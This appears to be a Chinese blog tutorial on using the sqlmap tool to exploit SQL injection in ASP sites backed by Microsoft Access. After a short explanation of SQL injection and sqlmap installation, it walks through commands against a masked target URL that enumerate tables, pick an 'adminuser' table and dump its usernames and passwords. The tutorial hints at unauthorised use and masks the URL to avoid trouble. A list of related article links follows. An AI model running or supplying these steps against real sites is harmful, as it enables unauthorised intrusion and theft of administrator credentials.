sqlmap注入Access
什么是SQL 注入 攻击? SQL 注入 攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员 也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的
什么是SQL注入攻击?
SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员
也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合
法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的
数据,这就是所谓的SQL Injection,即SQL注入。
什么是SQLMap?
SqlMap是一个开放源码的渗透测试工具,它可以自动探测和利用SQL注入漏洞和接管数据库服务器的过程。它通过了一个强
大的检测引擎,最终渗透测试和广泛的从数据库中的指纹持久的开关,对从数据库中提取数据,访问底层的文件系统和操作
系统执行命令的许多利基功能带外连接。
项目网站:http://sqlmap.sourceforge.net/
支持的数据库:MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB
看到了吧,几乎囊括了市面上所有的数据库
下载:http://downloads.sourceforge.net/sqlmap/sqlmap-0.9.tar.gz 最新版本 0.9
安装
sqlmap使用Python编写,解压之后直接使用
tar zxvf sqlmap-0.9.tar.gz
cd sqlmap-0.9/
运行
python sqlmap.py
or
chmod +x sqlmap.py
./sqlmap.py
帮助
python sqlmap.py -h
选项比较多
看不下去的童鞋可以先移步这里
网上几乎就只能看到帮助、说明的之类的,实例太少了,希望大家都踊跃发言,一起研究。
针对Access数据库一般就只能爆表,爆数据了(为避免不必要的麻烦,URL用www.xxx.com代替,你懂的)
./sqlmap.py -u "http://www.xxx.com.cn/shownews.asp?id=67" --table -u "你要注入的URL" --table 爆表
中间会出来一个让你输入线程的问号 你输入一个数字 5 ==都可以
它就会开始跑表了
跑出来这么几个表,聪明的童鞋一看就知道那个表会有我们想要的东西
下面开始爆指定表的列名,这里爆adminuser
./sqlmap.py -u "http://www.xxx.com.cn/shownews.asp?id=67" --columns -T amdinuser
已经出来了,你可以使用Ctrl+C停止,也可以耐心的再等等
爆数据吧
./sqlmap.py -u "http://www.xxx.com.cn/shownews.asp?id=67" --dump -T adminuser -C username,password
一会儿结果就出了
推荐阅读
-
使用PDO防sql注入的原理分析
-
ERROR 1045 (28000): Access denied for user root@localhost (using password: NO)
-
js设置全局变量用法(js注入攻击详细教程)
-
纯真ip数据库转换为(access)使用图文教程
-
编写通用的asp防注入程序
-
ASP.NET 2.0下随机读取Access记录的实现方法
-
ASP.NET MVC4+EF5+EasyUI+Unity2.x注入的后台管理系统之前端页面框架构建源码分享
-
MYSQL ERROR 1045 (28000): Access denied for user (using password: YES)问题的解决
-
T-SQL篇如何防止SQL注入的解决方法
-
Spring Boot集成Quartz注入Spring管理的类的方法